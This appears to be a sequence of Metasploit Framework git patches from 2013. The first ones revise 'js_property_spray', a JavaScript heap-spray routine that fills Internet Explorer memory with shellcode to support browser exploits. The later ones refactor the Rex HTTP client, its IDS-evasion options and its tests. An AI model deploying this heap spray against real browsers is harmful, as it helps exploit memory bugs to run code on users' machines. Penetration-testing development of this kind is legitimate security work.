js_property_spray - js = %Q|function sprayHeap(shellcode, browser, heapBlockSize, offset , maxAllocs) { + js = %Q|function sprayHeap( oArg ) { + + shellcode = oArg.shellcode; + browser = oArg.browser; + offset = oArg.offset; + heapBlockSize = oArg.heapBlockSize; + maxAllocs = oArg.maxAllocs; + objId = oArg.objId; + + if (shellcode == undefined) { throw "Missing argument: shellcode"; } + if (objId == undefined) { throw "Missing argument: objId"; } if (offset == undefined) { offset = 0x104; } if (heapBlockSize == undefined) { heapBlockSize = 0x40000; } - if (maxAllocs == undefined) { maxAllocs = 500; } + if (maxAllocs == undefined) { maxAllocs = 0x250; } if (browser == undefined) { browser = 'generic'; } - var div_container = document.createElement("div"); + var div_container = document.getElementById(objId); div_container.style.cssText = "display:none"; var data; junk = unescape("%u2020%u2020"); - while (junk.length < offset+0x1000) junk += junk; + while (junk.length < 0x1000) junk += junk; data = junk.substring(0,offset) + shellcode; data += junk.substring(0,0x800-offset-shellcode.length); @@ -821,22 +831,23 @@ protected switch (browser) { case 'ie8': - obj.title = data.substring(0,(heapBlockSize-6)/2); + obj.title = data.substring(0, (heapBlockSize-6)/2); div_container.appendChild(obj); break; case 'ie9': - obj.title = data.substring(0,(heapBlockSize-2)/2); + obj.title = data.substring(0, (heapBlockSize-2)/2); div_container.appendChild(obj); break; case 'ie10': - obj.title = data.substring(0,(heapBlockSize-2/2) / 2); + obj.title = data.substring(0, (heapBlockSize-2/2) / 2); div_container.appendChild(obj); break; case 'generic': - obj.title = data.substring(0, heapBlockSize); + obj.title = data.substring(0, heapBlockSize-0x58); + obj.style.fontFamily = data.substring(0, heapBlockSize-0x58); div_container.appendChild(obj); break; From 312638d6a5d3d72daf41e2c4097c109c9b63233f Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 27 Feb 2013 14:32:39 -0600 Subject: [PATCH 103/139] Correct allocation size for IE10 --- lib/msf/core/exploit/http/server.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index 0ec0b0beb2..32d54a541e 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb @@ -795,7 +795,9 @@ protected # # This heap spray technique takes advantage of MSHTML's SetStringProperty (or SetProperty) # function to trigger allocations by ntdll!RtlAllocateHeap. It is based on Corelan's - # publication on "DEPS – Precise Heap Spray on Firefox and IE10" + # publication on "DEPS – Precise Heap Spray on Firefox and IE10". + # + # # def js_property_spray js = %Q|function sprayHeap( oArg ) { @@ -841,7 +843,7 @@ protected break; case 'ie10': - obj.title = data.substring(0, (heapBlockSize-2/2) / 2); + obj.title = data.substring(0, (heapBlockSize-2)/2); div_container.appendChild(obj); break; From bb02dc43b35841aa5dcfc2cf4afe681bdd5a3e64 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 27 Feb 2013 15:34:21 -0600 Subject: [PATCH 104/139] Documentation --- lib/msf/core/exploit/http/server.rb | 36 +++++++++++++++++++++-------- 1 file changed, 27 insertions(+), 9 deletions(-) diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index 32d54a541e..6b5c143a9f 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb @@ -797,17 +797,34 @@ protected # function to trigger allocations by ntdll!RtlAllocateHeap. It is based on Corelan's # publication on "DEPS – Precise Heap Spray on Firefox and IE10". # - # + # The "sprayHeap" JavaScript function supports the following arguments: + # shellcode => The shellcode to spray in JavaScript. + # objId => The ID for a
HTML tag. + # browser => The type of browser to target for precise block size, such as: + # 'ie8', 'ie9', 'ie10', and 'generic'. + # offset => Optional. Number of bytes to align the shellcode, default: 0x104 + # heapBlockSize => Optional. Allocation size, default: 0x40000 + # maxAllocs => Optional. Number of allocation calls, default: 0x250 + # + # Example of using the 'sprayHeap' function: + #
+ # # def js_property_spray js = %Q|function sprayHeap( oArg ) { - shellcode = oArg.shellcode; - browser = oArg.browser; - offset = oArg.offset; + shellcode = oArg.shellcode; + browser = oArg.browser; + offset = oArg.offset; heapBlockSize = oArg.heapBlockSize; - maxAllocs = oArg.maxAllocs; - objId = oArg.objId; + maxAllocs = oArg.maxAllocs; + objId = oArg.objId; if (shellcode == undefined) { throw "Missing argument: shellcode"; } if (objId == undefined) { throw "Missing argument: objId"; } @@ -816,16 +833,18 @@ protected if (maxAllocs == undefined) { maxAllocs = 0x250; } if (browser == undefined) { browser = 'generic'; } + if (offset > 0x800) { throw "Bad alignment"; } + var div_container = document.getElementById(objId); div_container.style.cssText = "display:none"; var data; junk = unescape("%u2020%u2020"); - while (junk.length < 0x1000) junk += junk; + while (junk.length < offset+0x1000) junk += junk; data = junk.substring(0,offset) + shellcode; data += junk.substring(0,0x800-offset-shellcode.length); - while (data.length < 0x80000) data += data; + while (data.length < heapBlockSize) data += data; for (var i = 0; i < maxAllocs; i++) { @@ -849,7 +868,6 @@ protected case 'generic': obj.title = data.substring(0, heapBlockSize-0x58); - obj.style.fontFamily = data.substring(0, heapBlockSize-0x58); div_container.appendChild(obj); break; From d5ae54cbb64b3e1db831d07f9840226dd27a228e Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 27 Feb 2013 16:27:37 -0600 Subject: [PATCH 105/139] More accurate docs --- lib/rex/proto/http/client.rb | 22 +++++++++++++++------- 1 file changed, 15 insertions(+), 7 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index f3073ca530..5402b3ba3e 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -254,6 +254,7 @@ class Client # If the request is a 401, and we have creds, it will attempt to complete # authentication and return the final response # + # @return (see #_send_recv) def send_recv(req, t = -1, persist=false) res = _send_recv(req,t,persist) if res and res.code == 401 and res.headers['WWW-Authenticate'] @@ -271,7 +272,7 @@ class Client # Call this directly instead of {#send_recv} if you don't want automatic # authentication handling. # - # @return [Response] + # @return (see #read_response) def _send_recv(req, t = -1, persist=false) @pipeline = persist send_request(req, t) @@ -286,6 +287,7 @@ class Client # @param req [Request,ClientRequest,#to_s] The request to send # @param t (see #connect) # + # @return [void] def send_request(req, t = -1) connect(t) conn.put(req.to_s) @@ -299,6 +301,7 @@ class Client # @param opts [Hash] the options used to generate the original HTTP request # @param t [Fixnum] the timeout for the request in seconds # @param persist [Boolean] whether or not to persist the TCP connection (pipelining) + # # @return [Response] the last valid HTTP response object we received def send_auth(res, opts, t, persist) if opts['username'].nil? or opts['username'] == '' @@ -352,15 +355,19 @@ class Client return res end - # Converts username and password into the HTTP Basic - # authorization string. + # Converts username and password into the HTTP Basic authorization + # string. + # + # @return [String] A value suitable for use as an Authorization header def basic_auth_header(username,password) auth_str = username.to_s + ":" + password.to_s auth_str = "Basic " + Rex::Text.encode_base64(auth_str) end # Send a series of requests to complete Digest Authentication + # # @param opts [Hash] the options used to build an HTTP request + # # @return [Response] the last valid HTTP response we received def digest_auth(opts={}) @nonce_count = 0 @@ -495,14 +502,14 @@ class Client end end - # - # Opts - - # Inherits all the same options as send_request_cgi - # provider - What Negotiate Provider to use (supports NTLM and Negotiate) # # Builds a series of requests to complete Negotiate Auth. Works essentially # the same way as Digest auth. Same pipelining concerns exist. # + # @option opts (see #send_request_cgi) + # @option opts provider ["Negotiate","NTLM"] What Negotiate provider to use + # + # @return [Response] the last valid HTTP response we received def negotiate_auth(opts={}) ntlm_options = { :signing => false, @@ -608,6 +615,7 @@ class Client # # Read a response from the server # + # @return [Response] def read_response(t = -1, opts = {}) resp = Response.new From 5606db3f9ca93da80aebe24c0a5139f32c9cb951 Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 27 Feb 2013 16:28:17 -0600 Subject: [PATCH 106/139] Re-enable some commented tests --- spec/lib/rex/proto/http/client_spec.rb | 29 +++++++++++++++----------- 1 file changed, 17 insertions(+), 12 deletions(-) diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index d216c75325..8dc10b8c46 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb @@ -43,8 +43,8 @@ describe Rex::Proto::Http::Client do cli.instance_variable_get(:@context).should == {} cli.instance_variable_get(:@ssl).should be_false cli.instance_variable_get(:@proxies).should be_nil - # cli.instance_variable_get(:@username).should be_empty - # cli.instance_variable_get(:@password).should be_empty + cli.instance_variable_get(:@username).should be_empty + cli.instance_variable_get(:@password).should be_empty cli.config.should be_a_kind_of Hash end @@ -53,7 +53,11 @@ describe Rex::Proto::Http::Client do end it "should produce a CGI HTTP request" do - cli.request_cgi.should be_a_kind_of Rex::Proto::Http::ClientRequest + req = cli.request_cgi + req.should be_a_kind_of Rex::Proto::Http::ClientRequest + + req.port.should == 80 + req.ssl.should be_false end it "should attempt to connect to a server" do @@ -78,15 +82,16 @@ describe Rex::Proto::Http::Client do end it "should test for credentials" do - # cli.should_not have_creds - # this_cli = Rex::Proto::Http::Client.new("127.0.0.1", 1, {}, false, nil, nil, "user1", "pass1" ) - # this_cli.should have_creds - pending "Should actually respond to :has_creds" + pending "Should actually respond to :has_creds" do + cli.should_not have_creds + this_cli = described_class.new("127.0.0.1", 1, {}, false, nil, nil, "user1", "pass1" ) + this_cli.should have_creds + end end it "should send authentication", :pending => excuse_needs_connection - it "should produce a basic authentication header", :pending => "Waiting for #1500" do + it "should produce a basic authentication header" do u = "user1" p = "pass1" b64 = ["#{u}:#{p}"].pack("m*").strip @@ -114,10 +119,10 @@ describe Rex::Proto::Http::Client do end it "should tell if pipelining is enabled" do - cli.pipelining?.should be_false + cli.should_not be_pipelining this_cli = Rex::Proto::Http::Client.new("127.0.0.1", 1) this_cli.pipeline = true - this_cli.pipelining?.should be_true + this_cli.should be_pipelining end it "should respond to its various accessors" do @@ -129,8 +134,8 @@ describe Rex::Proto::Http::Client do cli.should respond_to :conn cli.should respond_to :context cli.should respond_to :proxies - # cli.should respond_to :username - # cli.should respond_to :password + cli.should respond_to :username + cli.should respond_to :password cli.should respond_to :junk_pipeline # These are supposed to be protected cli.should respond_to :ssl From 4edd46216f32d4c0009aadf8204b8bb4fcc8af89 Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 27 Feb 2013 17:29:26 -0600 Subject: [PATCH 107/139] Refactor config -> opts Puts all the evasion stuff in the same place as regular HTTP options to make it easier to deal with. --- lib/rex/proto/http/client.rb | 3 - lib/rex/proto/http/client_request.rb | 201 ++++++++---------- .../lib/rex/proto/http/client_request_spec.rb | 32 ++- spec/lib/rex/proto/http/client_spec.rb | 2 - 4 files changed, 103 insertions(+), 135 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 5402b3ba3e..b10af20c3c 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -23,7 +23,6 @@ module Http ### class Client - DefaultUserAgent = Rex::Proto::Http::ClientRequest::DefaultUserAgent # # Creates a new client instance @@ -41,8 +40,6 @@ class Client self.config = { 'read_max_data' => (1024*1024*1), 'vhost' => self.hostname, - 'version' => '1.1', - 'agent' => DefaultUserAgent, }.merge(Http::ClientRequest::DefaultConfig) self.config_types = { diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 1b55784e99..31933fe5f7 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -14,6 +14,25 @@ class ClientRequest DefaultUserAgent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" DefaultConfig = { + # + # Regular HTTP stuff + # + 'agent' => DefaultUserAgent, + 'cgi' => true, + 'cookie' => nil, + 'data' => '', + 'headers' => {}, + 'raw_headers' => '', + 'method' => 'GET', + 'path_info' => '', + 'port' => 80, + 'proto' => 'HTTP', + 'ssl' => false, + 'uri' => '/', + 'vars_get' => {}, + 'vars_post' => {}, + 'version' => '1.1', + # # Evasion options # @@ -45,6 +64,7 @@ class ClientRequest 'uri_fake_params_start' => false, # bool 'header_folding' => false, # bool 'chunked_size' => 0, # integer + # # NTLM Options # @@ -61,68 +81,25 @@ class ClientRequest 'DigestAuthIIS' => true } - attr_accessor :authorization - attr_accessor :cgi - attr_accessor :config - attr_accessor :connection - attr_accessor :content_type - attr_accessor :cookie - attr_accessor :data - attr_accessor :headers - attr_accessor :host - attr_accessor :method - attr_accessor :path - attr_accessor :port - attr_accessor :protocol - attr_accessor :query - attr_accessor :raw_headers - attr_accessor :ssl - attr_accessor :uri - attr_accessor :user_agent - attr_accessor :vars_get - attr_accessor :vars_post - attr_accessor :version - attr_reader :opts def initialize(opts={}) - @cgi = (opts['cgi'].nil? ? true : opts['cgi']) - @config = DefaultConfig.merge(opts['client_config'] || {}) - @connection = opts['connection'] - @content_type = opts['ctype'] - @cookie = opts['cookie'] - @data = opts['data'] || "" - @headers = opts['headers'] || {} - @host = opts['vhost'] - @method = opts['method'] || "GET" - @path = opts['path_info'] - @port = opts['port'] || 80 - @protocol = opts['proto'] || "HTTP" - @query = opts['query'] || "" - @ssl = opts['ssl'] - @raw_headers = opts['raw_headers'] || "" - @uri = opts['uri'] - @user_agent = opts['agent'] - @vars_get = opts['vars_get'] || {} - @vars_post = opts['vars_post'] || {} - @version = opts['version'] || "1.1" - @opts = opts - + @opts = DefaultConfig.merge(opts) end def to_s # Start GET query string - qstr = query.dup + qstr = opts['query'] ? opts['query'].dup : "" # Start POST data string - pstr = data.dup + pstr = opts['data'] ? opts['data'].dup : "" - if cgi + if opts['cgi'] uri_str= set_cgi - if (config['pad_get_params']) - 1.upto(config['pad_get_params_count'].to_i) do |i| + if (opts['pad_get_params']) + 1.upto(opts['pad_get_params_count'].to_i) do |i| qstr << '&' if qstr.length > 0 qstr << set_encode_uri(Rex::Text.rand_text_alphanumeric(rand(32)+1)) qstr << '=' @@ -130,33 +107,33 @@ class ClientRequest end end - vars_get.each_pair do |var,val| + opts['vars_get'].each_pair do |var,val| qstr << '&' if qstr.length > 0 - qstr << (config['encode_params'] ? set_encode_uri(var) : var) + qstr << (opts['encode_params'] ? set_encode_uri(var) : var) qstr << '=' - qstr << (config['encode_params'] ? set_encode_uri(val) : val) + qstr << (opts['encode_params'] ? set_encode_uri(val) : val) end - if (config['pad_post_params']) - 1.upto(config['pad_post_params_count'].to_i) do |i| + if (opts['pad_post_params']) + 1.upto(opts['pad_post_params_count'].to_i) do |i| rand_var = Rex::Text.rand_text_alphanumeric(rand(32)+1) rand_val = Rex::Text.rand_text_alphanumeric(rand(32)+1) pstr << '&' if pstr.length > 0 - pstr << (config['encode_params'] ? set_encode_uri(rand_var) : rand_var) + pstr << (opts['encode_params'] ? set_encode_uri(rand_var) : rand_var) pstr << '=' - pstr << (config['encode_params'] ? set_encode_uri(rand_val) : rand_val) + pstr << (opts['encode_params'] ? set_encode_uri(rand_val) : rand_val) end end - vars_post.each_pair do |var,val| + opts['vars_post'].each_pair do |var,val| pstr << '&' if pstr.length > 0 - pstr << (config['encode_params'] ? set_encode_uri(var) : var) + pstr << (opts['encode_params'] ? set_encode_uri(var) : var) pstr << '=' - pstr << (config['encode_params'] ? set_encode_uri(val) : val) + pstr << (opts['encode_params'] ? set_encode_uri(val) : val) end else uri_str = set_uri - if config['encode'] + if opts['encode'] qstr = set_encode_uri(qstr) end end @@ -166,7 +143,7 @@ class ClientRequest req << set_method_uri_spacer() req << set_uri_prepend() - if config['encode'] + if opts['encode'] req << set_encode_uri(uri_str) else req << uri_str @@ -185,7 +162,7 @@ class ClientRequest req << set_host_header # If an explicit User-Agent header is set, then use that instead of the value of user_agent - unless headers.keys.map{|x| x.downcase }.include?('user-agent') + unless opts['headers'].keys.map{|x| x.downcase }.include?('user-agent') req << set_agent_header end @@ -197,19 +174,19 @@ class ClientRequest req << set_content_type_header req << set_content_len_header(pstr.length) req << set_chunked_header() - req << raw_headers + req << opts['raw_headers'] req << set_body(pstr) end protected def set_uri - uri_str = uri.dup - if (config['uri_dir_self_reference']) + uri_str = opts['uri'].dup + if (opts['uri_dir_self_reference']) uri_str.gsub!('/', '/./') end - if (config['uri_dir_fake_relative']) + if (opts['uri_dir_fake_relative']) buf = "" uri_str.split('/').each do |part| cnt = rand(8)+2 @@ -222,10 +199,10 @@ class ClientRequest uri_str = buf end - if (config['uri_full_url']) - url = self.ssl ? "https://" : "http://" - url << self.config['vhost'] - url << ((self.port == 80) ? "" : ":#{self.port}") + if (opts['uri_full_url']) + url = opts['ssl'] ? "https://" : "http://" + url << opts['vhost'] + url << ((opts['port'] == 80) ? "" : ":#{opts['port']}") url << uri_str url else @@ -234,12 +211,12 @@ class ClientRequest end def set_cgi - uri_str = uri.dup - if (config['uri_dir_self_reference']) + uri_str = opts['uri'].dup + if (opts['uri_dir_self_reference']) uri_str.gsub!('/', '/./') end - if (config['uri_dir_fake_relative']) + if (opts['uri_dir_fake_relative']) buf = "" uri_str.split('/').each do |part| cnt = rand(8)+2 @@ -254,10 +231,10 @@ class ClientRequest url = uri_str - if (config['uri_full_url']) - url = self.ssl ? "https" : "http" - url << self.config['vhost'] - url << (self.port == 80) ? "" : ":#{self.port}" + if (opts['uri_full_url']) + url = opts['ssl'] ? "https" : "http" + url << opts['vhost'] + url << (opts['port'] == 80) ? "" : ":#{opts['port']}" url << uri_str end @@ -266,24 +243,24 @@ class ClientRequest def set_encode_uri(str) a = str.dup - config['uri_encode_count'].times { - a = Rex::Text.uri_encode(a, config['uri_encode_mode']) + opts['uri_encode_count'].times { + a = Rex::Text.uri_encode(a, opts['uri_encode_mode']) } return a end def set_method - ret = method.dup + ret = opts['method'].dup - if (config['method_random_valid']) + if (opts['method_random_valid']) ret = ['GET', 'POST', 'HEAD'][rand(3)] end - if (config['method_random_invalid']) + if (opts['method_random_invalid']) ret = Rex::Text.rand_text_alpha(rand(20)+1) end - if (config['method_random_case']) + if (opts['method_random_case']) ret = Rex::Text.to_rand_case(ret) end @@ -291,11 +268,11 @@ class ClientRequest end def set_method_uri_spacer - len = config['pad_method_uri_count'].to_i + len = opts['pad_method_uri_count'].to_i set = " " buf = "" - case config['pad_method_uri_type'] + case opts['pad_method_uri_type'] when 'tab' set = "\t" when 'apache' @@ -315,11 +292,11 @@ class ClientRequest def set_uri_prepend prefix = "" - if (config['uri_fake_params_start']) + if (opts['uri_fake_params_start']) prefix << '/%3fa=b/../' end - if (config['uri_fake_end']) + if (opts['uri_fake_end']) prefix << '/%20HTTP/1.0/../../' end @@ -331,7 +308,7 @@ class ClientRequest # TODO: # * Encode path information def set_path_info - path ? path : '' + opts['path_info'] ? opts['path_info'] : '' end # @@ -347,11 +324,11 @@ class ClientRequest # Return the spacing between the uri and the version # def set_uri_version_spacer - len = config['pad_uri_version_count'].to_i + len = opts['pad_uri_version_count'].to_i set = " " buf = "" - case config['pad_uri_version_type'] + case opts['pad_uri_version_type'] when 'tab' set = "\t" when 'apache' @@ -369,17 +346,17 @@ class ClientRequest # Return the HTTP version string # def set_version - ret = protocol + "/" + version + ret = opts['proto'] + "/" + opts['version'] - if (config['version_random_valid']) - ret = protocol + "/" + ['1.0', '1.1'][rand(2)] + if (opts['version_random_valid']) + ret = opts['proto'] + "/" + ['1.0', '1.1'][rand(2)] end - if (config['version_random_invalid']) + if (opts['version_random_invalid']) ret = Rex::Text.rand_text_alphanumeric(rand(20)+1) end - if (config['version_random_case']) + if (opts['version_random_case']) ret = Rex::Text.to_rand_case(ret) end @@ -390,7 +367,7 @@ class ClientRequest # Return a formatted header string # def set_formatted_header(var, val) - if (self.config['header_folding']) + if (self.opts['header_folding']) "#{var}:\r\n\t#{val}\r\n" else "#{var}: #{val}\r\n" @@ -401,38 +378,38 @@ class ClientRequest # Return the HTTP agent header # def set_agent_header - user_agent ? set_formatted_header("User-Agent", user_agent) : "" + opts['agent'] ? set_formatted_header("User-Agent", opts['agent']) : "" end def set_auth_header - authorization ? set_formatted_header("Authorization", authorization) : "" + opts['authorization'] ? set_formatted_header("Authorization", opts['authorization']) : "" end # # Return the HTTP cookie header # def set_cookie_header - cookie ? set_formatted_header("Cookie", cookie) : "" + opts['cookie'] ? set_formatted_header("Cookie", opts['cookie']) : "" end # # Return the HTTP connection header # def set_connection_header - connection ? set_formatted_header("Connection", connection) : "" + opts['connection'] ? set_formatted_header("Connection", opts['connection']) : "" end # # Return the content type header # def set_content_type_header - set_formatted_header("Content-Type", content_type) + opts['ctype'] ? set_formatted_header("Content-Type", opts['ctype']) : "" end # # Return the content length header def set_content_len_header(clen) - return "" if config['chunked_size'] > 0 + return "" if opts['chunked_size'] > 0 set_formatted_header("Content-Length", clen) end @@ -440,8 +417,8 @@ class ClientRequest # Return the HTTP Host header # def set_host_header - return "" if config['uri_full_url'] - host ||= config['vhost'] + return "" if opts['uri_full_url'] + host ||= opts['vhost'] # IPv6 addresses must be placed in brackets if Rex::Socket.is_ipv6?(host) @@ -449,8 +426,8 @@ class ClientRequest end # The port should be appended if non-standard - if not [80,443].include?(port) - host = host + ":#{port}" + if not [80,443].include?(opts['port']) + host = host + ":#{opts['port']}" end set_formatted_header("Host", host) @@ -462,8 +439,8 @@ class ClientRequest def set_extra_headers buf = '' - if (config['pad_fake_headers']) - 1.upto(config['pad_fake_headers_count'].to_i) do |i| + if (opts['pad_fake_headers']) + 1.upto(opts['pad_fake_headers_count'].to_i) do |i| buf << set_formatted_header( Rex::Text.rand_text_alphanumeric(rand(32)+1), Rex::Text.rand_text_alphanumeric(rand(32)+1) @@ -471,7 +448,7 @@ class ClientRequest end end - headers.each_pair do |var,val| + opts['headers'].each_pair do |var,val| buf << set_formatted_header(var, val) end @@ -479,7 +456,7 @@ class ClientRequest end def set_chunked_header - return "" if config['chunked_size'] == 0 + return "" if opts['chunked_size'] == 0 set_formatted_header('Transfer-Encoding', 'chunked') end @@ -487,11 +464,11 @@ class ClientRequest # Return the HTTP seperator and body string # def set_body(bdata) - return "\r\n" + bdata if config['chunked_size'] == 0 + return "\r\n" + bdata if opts['chunked_size'] == 0 str = bdata.dup chunked = '' while str.size > 0 - chunk = str.slice!(0,rand(config['chunked_size']) + 1) + chunk = str.slice!(0,rand(opts['chunked_size']) + 1) chunked << sprintf("%x", chunk.size) + "\r\n" + chunk + "\r\n" end "\r\n" + chunked + "0\r\n\r\n" diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index 154a1a9485..29db9873bf 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -4,7 +4,7 @@ require 'rex/proto/http/client_request' shared_context "with 'uri_dir_self_reference'" do before(:all) do - client_request.config['uri_dir_self_reference'] = true + client_request.opts['uri_dir_self_reference'] = true end it "should return the unmodified uri" do @@ -14,9 +14,9 @@ end shared_context "with no evasions" do before(:all) do - client_request.config['uri_dir_self_reference'] = false - client_request.config['uri_fake_params_start'] = false - client_request.config['uri_full_url'] = false + client_request.opts['uri_dir_self_reference'] = false + client_request.opts['uri_fake_params_start'] = false + client_request.opts['uri_full_url'] = false end it "should return the unmodified uri" do @@ -27,11 +27,11 @@ end shared_context "with 'uri_full_url'" do before(:all) do - client_request.config['uri_full_url'] = true + client_request.opts['uri_full_url'] = true end before(:each) do - client_request.config['vhost'] = host + client_request.opts['vhost'] = host end context "with ipv4 host" do @@ -43,7 +43,7 @@ shared_context "with 'uri_full_url'" do context "with ipv6 host" do let(:host) { '2001:DB8::1' } #before(:each) do - # client_request.config['vhost'] = "[#{host}]" + # client_request.opts['vhost'] = "[#{host}]" #end it_behaves_like "uri_full_url" @@ -83,9 +83,7 @@ describe Rex::Proto::Http::ClientRequest do [ "with reasonable default options", default_options.merge({ 'agent' => "Mozilla/4.0 (compatible; Metasploit RSPEC)", - # Yes, vhost is in the config. There is no godly reason why this - # should be so. - 'client_config' => { 'vhost' => 'www.example.com', }, + 'vhost' => 'www.example.com', }), { :set_cgi => { :result => "/" }, @@ -106,7 +104,7 @@ describe Rex::Proto::Http::ClientRequest do [ "with header folding", default_options.merge({ 'agent' => "Mozilla/4.0 (compatible; Metasploit RSPEC)", - 'client_config' => { 'header_folding' => true, } + 'header_folding' => true, }), { :set_uri => { :result => "/" }, @@ -124,7 +122,7 @@ describe Rex::Proto::Http::ClientRequest do [ "with ipv6 host", default_options.merge({ - 'client_config' => { 'vhost' => "2001:DB8::1" }, + 'vhost' => "2001:DB8::1", }), { :set_host_header => { :result => "Host: [2001:DB8::1]\r\n" }, @@ -134,7 +132,7 @@ describe Rex::Proto::Http::ClientRequest do [ "with ipv6 host and non-default port", default_options.merge({ 'port' => 1234, - 'client_config' => { 'vhost' => "2001:DB8::1" }, + 'vhost' => "2001:DB8::1", }), { :set_host_header => { :result => "Host: [2001:DB8::1]:1234\r\n" }, @@ -162,11 +160,9 @@ describe Rex::Proto::Http::ClientRequest do context "with GET paramaters" do subject(:client_request) { options_with_params = default_options.merge({ - 'client_config' => { - 'uri_encode_mode' => encode_mode, - 'encode_params' => encode_params, - 'encode' => false, - }, + 'uri_encode_mode' => encode_mode, + 'encode_params' => encode_params, + 'encode' => false, 'vars_get' => vars_get, }) Rex::Proto::Http::ClientRequest.new(options_with_params) diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index 8dc10b8c46..11177b90fe 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb @@ -56,8 +56,6 @@ describe Rex::Proto::Http::Client do req = cli.request_cgi req.should be_a_kind_of Rex::Proto::Http::ClientRequest - req.port.should == 80 - req.ssl.should be_false end it "should attempt to connect to a server" do From b0745b090ac4698d54097f383f5ea7486c6f2ba8 Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 27 Feb 2013 17:54:31 -0600 Subject: [PATCH 108/139] Msf HTTP uses this directly, can't axe it --- lib/rex/proto/http/client.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index b10af20c3c..be7b6cb436 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -23,6 +23,7 @@ module Http ### class Client + DefaultUserAgent = ClientRequest::DefaultUserAgent # # Creates a new client instance From 16bba7a6aca24d1dd28cddab66595d81d753f98d Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 27 Feb 2013 18:06:55 -0600 Subject: [PATCH 109/139] Add test for pad_get_params --- .../lib/rex/proto/http/client_request_spec.rb | 20 +++++++++++++++++-- 1 file changed, 18 insertions(+), 2 deletions(-) diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index 29db9873bf..26729dfa52 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -178,6 +178,22 @@ describe Rex::Proto::Http::ClientRequest do } end + context "with 'pad_get_params'" do + let(:encode_params) { true } + it "should ..." do + old = client_request.opts['pad_get_params'] + client_request.opts['pad_get_params'] = true + + client_request.opts['pad_get_params_count'] = 0 + client_request.to_s.split("&").length.should == vars_get.length + + client_request.opts['pad_get_params_count'] = 10 + client_request.to_s.split("&").length.should == vars_get.length + 10 + + client_request.opts['pad_get_params'] = old + end + end + context "without 'encode_params'" do let(:encode_params) { false } it "should contain the unaltered params" do @@ -190,7 +206,7 @@ describe Rex::Proto::Http::ClientRequest do context "with 'encode_params'" do let(:encode_params) { true } - context "with 'uri_encode_mode' = default (hex-normal)" do + context "and 'uri_encode_mode' = default (hex-normal)" do it "should encode special chars" do str = client_request.to_s str.should include("foo%5b%5d=bar") @@ -199,7 +215,7 @@ describe Rex::Proto::Http::ClientRequest do end end - context "with 'uri_encode_mode' = hex-all" do + context "and 'uri_encode_mode' = hex-all" do let(:encode_mode) { 'hex-all' } it "should encode all chars" do str = client_request.to_s From 425c245771f68e69b5b90ac5e6b984d10f9bfc58 Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 27 Feb 2013 19:13:05 -0600 Subject: [PATCH 110/139] Axe set_cgi in favor of set_uri They were identical except for a couple of extra bugs in set_cgi. Also changes ```split("/")``` to ```split("/", -1)```, which behaves correctly when the input has a seperator at the beginning or end. --- lib/rex/proto/http/client_request.rb | 38 ++---------------- .../lib/rex/proto/http/client_request_spec.rb | 40 ++++++++++++------- 2 files changed, 30 insertions(+), 48 deletions(-) diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 31933fe5f7..62e1ede0e8 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -32,6 +32,7 @@ class ClientRequest 'vars_get' => {}, 'vars_post' => {}, 'version' => '1.1', + 'vhost' => nil, # # Evasion options @@ -96,7 +97,7 @@ class ClientRequest pstr = opts['data'] ? opts['data'].dup : "" if opts['cgi'] - uri_str= set_cgi + uri_str = set_uri if (opts['pad_get_params']) 1.upto(opts['pad_get_params_count'].to_i) do |i| @@ -132,10 +133,10 @@ class ClientRequest pstr << (opts['encode_params'] ? set_encode_uri(val) : val) end else - uri_str = set_uri if opts['encode'] qstr = set_encode_uri(qstr) end + uri_str = set_uri end req = '' @@ -188,7 +189,7 @@ class ClientRequest if (opts['uri_dir_fake_relative']) buf = "" - uri_str.split('/').each do |part| + uri_str.split('/',-1).each do |part| cnt = rand(8)+2 1.upto(cnt) { |idx| buf << "/" + Rex::Text.rand_text_alphanumeric(rand(32)+1) @@ -210,37 +211,6 @@ class ClientRequest end end - def set_cgi - uri_str = opts['uri'].dup - if (opts['uri_dir_self_reference']) - uri_str.gsub!('/', '/./') - end - - if 